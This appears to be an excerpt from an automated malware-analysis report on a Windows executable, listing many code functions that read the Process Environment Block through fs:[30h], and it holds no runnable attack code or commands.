          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A9B8D0 mov eax, dword ptr fs:[00000030h] | 1_2_00A9B8D0
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A1B02A mov eax, dword ptr fs:[00000030h] | 1_2_00A1B02A
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A1B02A mov eax, dword ptr fs:[00000030h] | 1_2_00A1B02A
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A1B02A mov eax, dword ptr fs:[00000030h] | 1_2_00A1B02A
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A1B02A mov eax, dword ptr fs:[00000030h] | 1_2_00A1B02A
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A3002D mov eax, dword ptr fs:[00000030h] | 1_2_00A3002D
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A3002D mov eax, dword ptr fs:[00000030h] | 1_2_00A3002D
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A3002D mov eax, dword ptr fs:[00000030h] | 1_2_00A3002D
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A3002D mov eax, dword ptr fs:[00000030h] | 1_2_00A3002D
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A3002D mov eax, dword ptr fs:[00000030h] | 1_2_00A3002D
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00AD4015 mov eax, dword ptr fs:[00000030h] | 1_2_00AD4015
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00AD4015 mov eax, dword ptr fs:[00000030h] | 1_2_00AD4015
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A87016 mov eax, dword ptr fs:[00000030h] | 1_2_00A87016
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A87016 mov eax, dword ptr fs:[00000030h] | 1_2_00A87016
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A87016 mov eax, dword ptr fs:[00000030h] | 1_2_00A87016
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00AD1074 mov eax, dword ptr fs:[00000030h] | 1_2_00AD1074
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00AC2073 mov eax, dword ptr fs:[00000030h] | 1_2_00AC2073
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A20050 mov eax, dword ptr fs:[00000030h] | 1_2_00A20050
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A20050 mov eax, dword ptr fs:[00000030h] | 1_2_00A20050
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A361A0 mov eax, dword ptr fs:[00000030h] | 1_2_00A361A0
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A361A0 mov eax, dword ptr fs:[00000030h] | 1_2_00A361A0
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00AC49A4 mov eax, dword ptr fs:[00000030h] | 1_2_00AC49A4
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00AC49A4 mov eax, dword ptr fs:[00000030h] | 1_2_00AC49A4
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00AC49A4 mov eax, dword ptr fs:[00000030h] | 1_2_00AC49A4
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00AC49A4 mov eax, dword ptr fs:[00000030h] | 1_2_00AC49A4
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A869A6 mov eax, dword ptr fs:[00000030h] | 1_2_00A869A6
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A851BE mov eax, dword ptr fs:[00000030h] | 1_2_00A851BE
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A851BE mov eax, dword ptr fs:[00000030h] | 1_2_00A851BE
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A851BE mov eax, dword ptr fs:[00000030h] | 1_2_00A851BE
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A851BE mov eax, dword ptr fs:[00000030h] | 1_2_00A851BE
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A2C182 mov eax, dword ptr fs:[00000030h] | 1_2_00A2C182
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A3A185 mov eax, dword ptr fs:[00000030h] | 1_2_00A3A185
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A32990 mov eax, dword ptr fs:[00000030h] | 1_2_00A32990
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A0B1E1 mov eax, dword ptr fs:[00000030h] | 1_2_00A0B1E1
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A0B1E1 mov eax, dword ptr fs:[00000030h] | 1_2_00A0B1E1
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A0B1E1 mov eax, dword ptr fs:[00000030h] | 1_2_00A0B1E1
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A941E8 mov eax, dword ptr fs:[00000030h] | 1_2_00A941E8
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A24120 mov eax, dword ptr fs:[00000030h] | 1_2_00A24120
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A24120 mov eax, dword ptr fs:[00000030h] | 1_2_00A24120
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A24120 mov eax, dword ptr fs:[00000030h] | 1_2_00A24120
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A24120 mov eax, dword ptr fs:[00000030h] | 1_2_00A24120
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A24120 mov ecx, dword ptr fs:[00000030h] | 1_2_00A24120
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A3513A mov eax, dword ptr fs:[00000030h] | 1_2_00A3513A
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A3513A mov eax, dword ptr fs:[00000030h] | 1_2_00A3513A
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A09100 mov eax, dword ptr fs:[00000030h] | 1_2_00A09100
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A09100 mov eax, dword ptr fs:[00000030h] | 1_2_00A09100
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A09100 mov eax, dword ptr fs:[00000030h] | 1_2_00A09100
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A0C962 mov eax, dword ptr fs:[00000030h] | 1_2_00A0C962
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A0B171 mov eax, dword ptr fs:[00000030h] | 1_2_00A0B171
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A0B171 mov eax, dword ptr fs:[00000030h] | 1_2_00A0B171
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A2B944 mov eax, dword ptr fs:[00000030h] | 1_2_00A2B944
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A2B944 mov eax, dword ptr fs:[00000030h] | 1_2_00A2B944
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A052A5 mov eax, dword ptr fs:[00000030h] | 1_2_00A052A5
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A052A5 mov eax, dword ptr fs:[00000030h] | 1_2_00A052A5
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A052A5 mov eax, dword ptr fs:[00000030h] | 1_2_00A052A5
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A052A5 mov eax, dword ptr fs:[00000030h] | 1_2_00A052A5
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A052A5 mov eax, dword ptr fs:[00000030h] | 1_2_00A052A5
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A1AAB0 mov eax, dword ptr fs:[00000030h] | 1_2_00A1AAB0
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A1AAB0 mov eax, dword ptr fs:[00000030h] | 1_2_00A1AAB0
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A3FAB0 mov eax, dword ptr fs:[00000030h] | 1_2_00A3FAB0
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A3D294 mov eax, dword ptr fs:[00000030h] | 1_2_00A3D294
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A3D294 mov eax, dword ptr fs:[00000030h] | 1_2_00A3D294
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A32AE4 mov eax, dword ptr fs:[00000030h] | 1_2_00A32AE4
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A32ACB mov eax, dword ptr fs:[00000030h] | 1_2_00A32ACB
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A44A2C mov eax, dword ptr fs:[00000030h] | 1_2_00A44A2C
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A44A2C mov eax, dword ptr fs:[00000030h] | 1_2_00A44A2C
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A18A0A mov eax, dword ptr fs:[00000030h] | 1_2_00A18A0A
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A05210 mov eax, dword ptr fs:[00000030h] | 1_2_00A05210
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A05210 mov ecx, dword ptr fs:[00000030h] | 1_2_00A05210
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A05210 mov eax, dword ptr fs:[00000030h] | 1_2_00A05210
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A05210 mov eax, dword ptr fs:[00000030h] | 1_2_00A05210
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A0AA16 mov eax, dword ptr fs:[00000030h] | 1_2_00A0AA16
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A0AA16 mov eax, dword ptr fs:[00000030h] | 1_2_00A0AA16
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00ACAA16 mov eax, dword ptr fs:[00000030h] | 1_2_00ACAA16
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00ACAA16 mov eax, dword ptr fs:[00000030h] | 1_2_00ACAA16
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A23A1C mov eax, dword ptr fs:[00000030h] | 1_2_00A23A1C
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00ABB260 mov eax, dword ptr fs:[00000030h] | 1_2_00ABB260
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00ABB260 mov eax, dword ptr fs:[00000030h] | 1_2_00ABB260
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00AD8A62 mov eax, dword ptr fs:[00000030h] | 1_2_00AD8A62
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A4927A mov eax, dword ptr fs:[00000030h] | 1_2_00A4927A
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A09240 mov eax, dword ptr fs:[00000030h] | 1_2_00A09240
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A09240 mov eax, dword ptr fs:[00000030h] | 1_2_00A09240
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A09240 mov eax, dword ptr fs:[00000030h] | 1_2_00A09240
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A09240 mov eax, dword ptr fs:[00000030h] | 1_2_00A09240
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00ACEA55 mov eax, dword ptr fs:[00000030h] | 1_2_00ACEA55
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A94257 mov eax, dword ptr fs:[00000030h] | 1_2_00A94257
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00AD5BA5 mov eax, dword ptr fs:[00000030h] | 1_2_00AD5BA5
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A34BAD mov eax, dword ptr fs:[00000030h] | 1_2_00A34BAD
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A34BAD mov eax, dword ptr fs:[00000030h] | 1_2_00A34BAD
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A34BAD mov eax, dword ptr fs:[00000030h] | 1_2_00A34BAD
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00AC138A mov eax, dword ptr fs:[00000030h] | 1_2_00AC138A
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00ABD380 mov ecx, dword ptr fs:[00000030h] | 1_2_00ABD380
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A11B8F mov eax, dword ptr fs:[00000030h] | 1_2_00A11B8F
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A11B8F mov eax, dword ptr fs:[00000030h]1_2_00A11B8F
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A3B390 mov eax, dword ptr fs:[00000030h]1_2_00A3B390
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A32397 mov eax, dword ptr fs:[00000030h]1_2_00A32397
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A303E2 mov eax, dword ptr fs:[00000030h]1_2_00A303E2
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A303E2 mov eax, dword ptr fs:[00000030h]1_2_00A303E2
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A303E2 mov eax, dword ptr fs:[00000030h]1_2_00A303E2
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A303E2 mov eax, dword ptr fs:[00000030h]1_2_00A303E2
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A303E2 mov eax, dword ptr fs:[00000030h]1_2_00A303E2
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A303E2 mov eax, dword ptr fs:[00000030h]1_2_00A303E2
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A2DBE9 mov eax, dword ptr fs:[00000030h]1_2_00A2DBE9
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A853CA mov eax, dword ptr fs:[00000030h]1_2_00A853CA
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A853CA mov eax, dword ptr fs:[00000030h]1_2_00A853CA
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AC131B mov eax, dword ptr fs:[00000030h]1_2_00AC131B
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A0DB60 mov ecx, dword ptr fs:[00000030h]1_2_00A0DB60
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A33B7A mov eax, dword ptr fs:[00000030h]1_2_00A33B7A
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A33B7A mov eax, dword ptr fs:[00000030h]1_2_00A33B7A
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A0DB40 mov eax, dword ptr fs:[00000030h]1_2_00A0DB40
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AD8B58 mov eax, dword ptr fs:[00000030h]1_2_00AD8B58
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A0F358 mov eax, dword ptr fs:[00000030h]1_2_00A0F358
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A1849B mov eax, dword ptr fs:[00000030h]1_2_00A1849B
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AC14FB mov eax, dword ptr fs:[00000030h]1_2_00AC14FB
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A86CF0 mov eax, dword ptr fs:[00000030h]1_2_00A86CF0
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A86CF0 mov eax, dword ptr fs:[00000030h]1_2_00A86CF0
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A86CF0 mov eax, dword ptr fs:[00000030h]1_2_00A86CF0
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AD8CD6 mov eax, dword ptr fs:[00000030h]1_2_00AD8CD6
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A3BC2C mov eax, dword ptr fs:[00000030h]1_2_00A3BC2C
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AD740D mov eax, dword ptr fs:[00000030h]1_2_00AD740D
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AD740D mov eax, dword ptr fs:[00000030h]1_2_00AD740D
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AD740D mov eax, dword ptr fs:[00000030h]1_2_00AD740D
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A86C0A mov eax, dword ptr fs:[00000030h]1_2_00A86C0A
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A86C0A mov eax, dword ptr fs:[00000030h]1_2_00A86C0A
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A86C0A mov eax, dword ptr fs:[00000030h]1_2_00A86C0A
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A86C0A mov eax, dword ptr fs:[00000030h]1_2_00A86C0A
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h]1_2_00AC1C06
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h]1_2_00AC1C06
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h]1_2_00AC1C06
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h]1_2_00AC1C06
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h]1_2_00AC1C06
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h]1_2_00AC1C06
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h]1_2_00AC1C06
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h]1_2_00AC1C06
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h]1_2_00AC1C06
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h]1_2_00AC1C06
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h]1_2_00AC1C06
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h]1_2_00AC1C06
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h]1_2_00AC1C06
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h]1_2_00AC1C06
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A2746D mov eax, dword ptr fs:[00000030h]1_2_00A2746D
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A3A44B mov eax, dword ptr fs:[00000030h]1_2_00A3A44B
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A9C450 mov eax, dword ptr fs:[00000030h]1_2_00A9C450
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A9C450 mov eax, dword ptr fs:[00000030h]1_2_00A9C450
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AD05AC mov eax, dword ptr fs:[00000030h]1_2_00AD05AC
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AD05AC mov eax, dword ptr fs:[00000030h]1_2_00AD05AC
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A335A1 mov eax, dword ptr fs:[00000030h]1_2_00A335A1
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A31DB5 mov eax, dword ptr fs:[00000030h]1_2_00A31DB5
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A31DB5 mov eax, dword ptr fs:[00000030h]1_2_00A31DB5
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A31DB5 mov eax, dword ptr fs:[00000030h]1_2_00A31DB5
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A32581 mov eax, dword ptr fs:[00000030h]1_2_00A32581
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A32581 mov eax, dword ptr fs:[00000030h]1_2_00A32581
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A32581 mov eax, dword ptr fs:[00000030h]1_2_00A32581
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A32581 mov eax, dword ptr fs:[00000030h]1_2_00A32581
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A02D8A mov eax, dword ptr fs:[00000030h]1_2_00A02D8A
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A02D8A mov eax, dword ptr fs:[00000030h]1_2_00A02D8A
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A02D8A mov eax, dword ptr fs:[00000030h]1_2_00A02D8A
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A02D8A mov eax, dword ptr fs:[00000030h]1_2_00A02D8A
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A02D8A mov eax, dword ptr fs:[00000030h]1_2_00A02D8A
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A3FD9B mov eax, dword ptr fs:[00000030h]1_2_00A3FD9B
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A3FD9B mov eax, dword ptr fs:[00000030h]1_2_00A3FD9B
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A1D5E0 mov eax, dword ptr fs:[00000030h]1_2_00A1D5E0
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A1D5E0 mov eax, dword ptr fs:[00000030h]1_2_00A1D5E0
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00ACFDE2 mov eax, dword ptr fs:[00000030h]1_2_00ACFDE2
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00ACFDE2 mov eax, dword ptr fs:[00000030h]1_2_00ACFDE2
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00ACFDE2 mov eax, dword ptr fs:[00000030h]1_2_00ACFDE2
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00ACFDE2 mov eax, dword ptr fs:[00000030h]1_2_00ACFDE2
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AB8DF1 mov eax, dword ptr fs:[00000030h]1_2_00AB8DF1
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A86DC9 mov eax, dword ptr fs:[00000030h]1_2_00A86DC9
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A86DC9 mov eax, dword ptr fs:[00000030h]1_2_00A86DC9
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A86DC9 mov eax, dword ptr fs:[00000030h]1_2_00A86DC9
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A86DC9 mov ecx, dword ptr fs:[00000030h]1_2_00A86DC9
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A86DC9 mov eax, dword ptr fs:[00000030h]1_2_00A86DC9
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A86DC9 mov eax, dword ptr fs:[00000030h]1_2_00A86DC9
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A0AD30 mov eax, dword ptr fs:[00000030h]1_2_00A0AD30
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h]1_2_00A13D34
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h]1_2_00A13D34
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h]1_2_00A13D34
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h]1_2_00A13D34
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h]1_2_00A13D34
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h]1_2_00A13D34
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h]1_2_00A13D34
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h]1_2_00A13D34
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h]1_2_00A13D34
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h]1_2_00A13D34
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h]1_2_00A13D34
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h]1_2_00A13D34
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h]1_2_00A13D34
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00ACE539 mov eax, dword ptr fs:[00000030h]1_2_00ACE539
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A34D3B mov eax, dword ptr fs:[00000030h]1_2_00A34D3B
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A34D3B mov eax, dword ptr fs:[00000030h]1_2_00A34D3B
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A34D3B mov eax, dword ptr fs:[00000030h]1_2_00A34D3B
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AD8D34 mov eax, dword ptr fs:[00000030h]1_2_00AD8D34
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A8A537 mov eax, dword ptr fs:[00000030h]1_2_00A8A537
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A2C577 mov eax, dword ptr fs:[00000030h]1_2_00A2C577
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A2C577 mov eax, dword ptr fs:[00000030h]1_2_00A2C577
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A43D43 mov eax, dword ptr fs:[00000030h]1_2_00A43D43
